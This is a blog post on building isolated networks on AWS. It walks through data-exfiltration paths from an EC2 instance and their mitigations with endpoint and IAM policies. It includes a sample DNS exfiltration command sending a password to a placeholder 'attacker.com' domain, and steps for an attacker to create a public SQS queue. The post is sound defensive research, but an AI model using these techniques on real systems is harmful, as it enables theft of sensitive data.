Isolated networks on AWS

2020.03.31

RSS feed

It is possible on AWS to have an isolated network where you cannot communicate in or out except through limited, controlled pathways. Setting something like this up has some gotchas. This post provides a CDK app (here) to help you experiment and see these issues for yourself, with discussions of the gotchas, their mitigations, and limitations of those mitigations.

Edit 2020-04-01: Based on input from kingwalterii, the S3 section has been updated to include Access Point restrictions.

Example in a physical network

To explain this setup, let’s first look at a simple physical example of an isolated computer. Imagine a single physical computer in an empty room. This is not connected to the Internet or any network. It has power and is connected to a single LED light, and this computer contains sensitive information in it. I then hire you (and you happen to be malicious) to write some code that turns this light on or off for me, based on some code you write.

Physical example of an isolated network

Physical example of an isolated network

Maybe the algorithm you write tells me to buy or sell a stock based on whether the light turns on or off. Your only input to me is a physical CD I put in the computer, and I run your code on this computer while I’m there by myself. You aren’t in the room. Under these circumstances, it is possible to avoid having you learn whether the light was turned on or off, and without exfilling the sensitive data from the computer out. We can assume that precautions have been taken to avoid the attacker monitoring the power usage to the room, TEMPEST monitoring, or other threats.

Although contrived, this is a rough enough approximation of some real-world situations, especially those worried about inside threats.

Example in AWS

Now we want to recreate this setup in AWS, so instead of a local physical computer we have an EC2, and instead of an LED, a message is sent to an SQS. You give me code to run on the EC2, and it sends a 1 or 0 to the SQS. In order to have an isolated network, the VPC this EC2 runs in has no Internet Gateway, NAT Gateway, IPv6 Egress-Only Gateway, or other means of communicating out to the Internet or from the Internet into the network. The Route Table has a single entry for the 10.0.0.0/24 traffic to target the “local” network.

AWS example of an isolated network

AWS example of an isolated network

In order to set up the EC2, we could create a custom AMI for it, provide it with a boot script, or other means. The output to the SQS would pass through a VPC endpoint, in this case an Interface endpoint, also known as PrivateLink. There are over 45 AWS services that support VPC endpoints.

Experimental isolated network

I’ve created a CDK app here that deploy an EC2 in an isolated network. You will need full admin privileges to deploy it. It is created as a basic attempt at an isolated network that, as a result, has some weaknesses that an attacker could abuse to exfil data out if they were able to execute arbitrary code on the EC2. It does not have flaws that would allow an attacker in.

In order to make experimenting easier, this CDK app sets up SSM Session Manager which gives us terminal access to our instance. The Amazon Linux 2 AMIs come with the SSM agent (code here) installed by default, which calls out to the SSM service and long-polls it, waiting for responses. In order to use SSM Session Manager, the app creates more VPC endpoints for the SSM service, ssm_messages, and ec2_messages. The experimental isolated network also adds a Gateway Endpoint for S3 so we can see what that looks like, as S3 and DynamoDB are the only two services that use Gateway Endpoints as opposed to Interface endpoints. This app should only cost about $32/mo, but you can quickly destroy it after experimenting with it.

Experimental isolated network setup

Experimental isolated network setup

Connecting

In order to access the EC2 via the Session Manager terminal session, after deploying this CDK, in the web console, search in the EC2 console for the EC2 named IsolatedNetworkExperimentStack. Select the instance and click “Connect”. For this experiment use an admin role in your AWS account.

Finding the EC2 in the web console

Finding the EC2 in the web console

Choose the “Session Manager” option and click “Connect”.

Connecting to the EC2 with Session Manager

Connecting to the EC2 with Session Manager

You should now have a terminal session in your browser.

Session Manager session

Session Manager session

DNS exfil

In order to confirm this network is isolated, you can try to ping 8.8.8.8, and you’ll see there are no responses. If you try to ping a domain, such as google.com, you’ll see:

$ ping google.com
PING google.com (172.217.13.78) 56(84) bytes of data.
^C
--- google.com ping statistics ---
4 packets transmitted, 0 received, 100% packet loss, time 3060ms

Again, we had 100% packet loss, but you’ll notice that it did figure out the IP for google.com. This is because by default, all VPCs have a DNS server running on 169.254.169.253. That magic IP address is similar to the metadata service on 169.254.169.254 in that it can’t be blocked via Security Groups or NACLs, you have no access to the logs from it, and VPC Flow Logs don’t record connections to it. GuardDuty has some visibility into these DNS logs, but not you, and you can’t rely on GuardDuty to detect (and definitely not prevent) exfil. There are a few other services in the 169.254/16 range, such as a time server and Windows license server, but DNS is the important one for our conversation because it allows exfil. I don’t believe any of the other services do.

As a simple example of what I mean by DNS exfil or DNS tunnelling, an attacker that has access to the EC2 could exfil data by doing something like:

host the_password_is_password123.attacker.com

The attacker would then have to have setup a DNS server for the attacker.com domain that could record and potentially respond to these requests, possibly even allowing an SSH like session to happen entirely through DNS, using something like https://github.com/yarrick/iodine. This idea is explored further by Dejan Zelic in his post Using DNS to break out of isolated networks in a AWS cloud environment.

Mitigations

To mitigate this, you need to turn off AWS’s DNS service for the VPC. This is discussed in the AWS docs here and involves the command modify-vpc-attribute. Obviously once you do this, you will no longer have DNS for your EC2. You will not be able to use SSM Session Manager anymore because your EC2 will not know where the VPC endpoints are to beacon to. You can either setup your own DNS server, or you can manually hard-code some values into your EC2’s /etc/hosts file. To find the IPs and domains you need, from a CLI with admin access (not the EC2, as you do not have the necessary privileges or end-points accessible), run:

aws ec2 describe-vpc-endpoints

You’ll then be able to find an interface (ex. eni-0555bf66a28979277) and associated DNS name (ex. ssm.us-east-1.amazonaws.com). Then use interface names with this command:

aws ec2 describe-network-interfaces --network-interface-ids eni-0555bf66a28979277

Then you can add lines to your /etc/hosts file such as:

10.0.0.188 ssm.us-east-1.amazonaws.com

Once you have all those VPC endpoints filled in, you can restart the EC2 and turn off DNS, but for simplicity for the rest of this tutorial, we can just leave DNS on and ignore this exfil path.

Another option, which I have not tried yet, but have heard from others, is to use Route 53 Resolver.

Accessing the SQS

The IAM policy of the EC2 has granted sqs:* on * and the CDK app created an SQS queue. If we try to list the queues with aws --region us-east-1 sqs list-queues the request will hang, running with --debug helps indicate that we can’t access queue.amazonaws.com. When making requests from the isolated subnet we need to specify the end-point URL to use so that requests go through our VPC endpoint. This is done with:

aws --region us-east-1 --endpoint-url https://sqs.us-east-1.amazonaws.com sqs list-queues

We can also send messages to this queue with:

aws --region us-east-1 --endpoint-url https://sqs.us-east-1.amazonaws.com sqs send-message --queue-url https://queue.amazonaws.com/000000000000/IsolatedNetworkExperimentStack-queue276F7297-1PHZ7GJS3L52F --message-body hello

Our VPC endpoint has a policy of:

{
  "Statement": [
    {
      "Action": "*",
      "Effect": "Allow",
      "Principal": "*",
      "Resource": "*"
    }
  ]
}

This means we can communicate with any SQS, including one in an attacker controlled AWS account. We might have a lot of applications in our isolated network that need to communicate with various SQS queues, so we don’t want to lock our endpoint policy down too tightly. We could lock down our IAM policy on the EC2 IAM Role, but an attacker could just bring their own access key along.

Mitigation

To restrict what queues can be accessed through our VPC endpoint, we can change the endpoint policy for the VPC endpoint for SQS to:

{
    "Statement": [
        {
            "Action": "sqs:*",
            "Effect": "Allow",
            "Resource": [
                "*:*:*:*:000000000000:*",
                "*:*:*:*:111111111111:*"
            ],
            "Principal": "*",
            "Condition": {
                "StringEquals": {
                    "aws:PrincipalOrgID": "o-0000000000"
                }
            }
        }
    ]
}

This ensures that resources in the isolated network can only use the VPC endpoint for SQS if they try to interact with SQS queues controlled by accounts we own (000000000000 and 111111111111) and only if the principal is from our Org (o-0000000000) so an attacker can’t use their own access key.

Limitations

Public queues

An attacker could still create a publicly accessible SQS and then from their attacker account, access that SQS. For example, this can be done by creating the file attributes.json with the contents:

{"Policy":"{\"Statement\": {\"Action\": \"sqs:*\",\"Effect\": \"Allow\",\"Resource\": \"*\",\"Principal\": \"*\"}}"}

And then running:

aws --region us-east-1 --endpoint-url https://sqs.us-east-1.amazonaws.com sqs create-queue --queue-name test --attributes file://attributes.json

The attacker would need to know the account ID in order to find the SQS.

Timing attacks

Even if you restricted queues from being made public somehow (which is not currently possible with IAM or other means), an attacker could still use timing attacks where they create and delete a queue, and then the attacker, from another account could attempt to send messages to it, which would result in either an AccessDenied or AWS.SimpleQueueService.NonExistentQueue.

Accessing S3

Unlike most services that use Interface endpoints, S3 and DynamoDB were the first services that could be accessed directly from a VPC and use Gateway Endpoints. The difference is that Gateway endpoints exist as route table entries, whereas Interface endpoints exist as network interfaces. Interface endpoints have IP addresses and can have Security Groups associated with them. They also cost $7/mo and $0.01/GB. Gateway endpoints are free, and do not have Security Groups associated with them.

Running aws ec2 describe-route-tables I see the following in the response:

"Routes": [
    {
        "DestinationCidrBlock": "10.0.0.0/24",
        "GatewayId": "local",
        "Origin": "CreateRouteTable",
        "State": "active"
    },
    {
        "DestinationPrefixListId": "pl-63a5400a",
        "GatewayId": "vpce-029ddfccced52cd28",
        "Origin": "CreateRoute",
        "State": "active"
    }
]

The first element shows that 10.0.0.0/24 is routed locally, as that is the subnet range. The next element is the Gateway endpoint for S3. I can confirm this by running aws ec2 describe-prefix-lists and I see in the response:

{
    "Cidrs": [
        "54.231.0.0/17",
        "52.216.0.0/15",
        "3.5.16.0/21",
        "3.5.0.0/20"
    ],
    "PrefixListId": "pl-63a5400a",
    "PrefixListName": "com.amazonaws.us-east-1.s3"
},

Those IPs are associated with S3 servers.

Similar to the SQS Interface policy, we can set a policy on the S3 Gateway endpoint, but because S3 buckets do not have account IDs in their ARNs, we have to individually list each S3 bucket or use S3 Access Points.

To restrict access similar to the SQS, you can use:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": "*",
            "Action": [
                "s3:ListBucket",
                "s3:GetObject"
            ],
            "Resource": "*",
            "Condition": {
                "StringEquals": {
                    "s3:AccessPointNetworkOrigin": "VPC",
                    "aws:PrincipalOrgID": "o-0000000000",
                    "s3:DataAccessPointAccount": ["000000000000", "111111111111"]
                }
            }
        }
    ]
}

The CDK app includes an access point that you can access from the CLI with:

aws s3 ls arn:aws:s3:us-east-1:000000000000:accesspoint/isolatedaccesspoint

Other Interface endpoints

I mentioned that there were over 45 services that support VPC Interface endpoints. Unfortunately, only 24 support endpoint policies, which are listed here. I therefore believe for example that an attacker could provide credentials for his own account to the SSM agent on the EC2 to trick it into connecting to his account through the Interface endpoints created for it in this VPC, and you cannot stop that. For that reason, in an isolated network, SSM Session Manager is not an ideal connection mechanism, but it satisfies our needs for our experimenting.

Other exfil paths in isolated networks

One interesting aspect of “comprehensive” exfiltration control is governing delegated/secondary API calls triggered by the APIs you actually call. Easy example would be s3:PutObject with a local bucket/principal using SSE-KMS in a remote account which then gets CT events Dan Peebles

As Dan mentioned there are also exfil paths via indirect calls and events that get recorded in attacker controlled CloudTrail logs. Data can be leaked by polling an account for whether or not resources exist. Rhino Security for example showed how this can be done to detect the existence of IAM roles in a target account.

Little has been written about isolated networks on AWS and the mistakes that can be made with them on AWS, so I hope I’ve helped open the discussion more and research into them. I also recommend reading Square’s post titled Adopting AWS VPC Endpoints at Square, authored by Harihara Krishnan Narayanan. This is an area of AWS that is ripe for more research, tooling to detect common mistakes, and best practice guidance.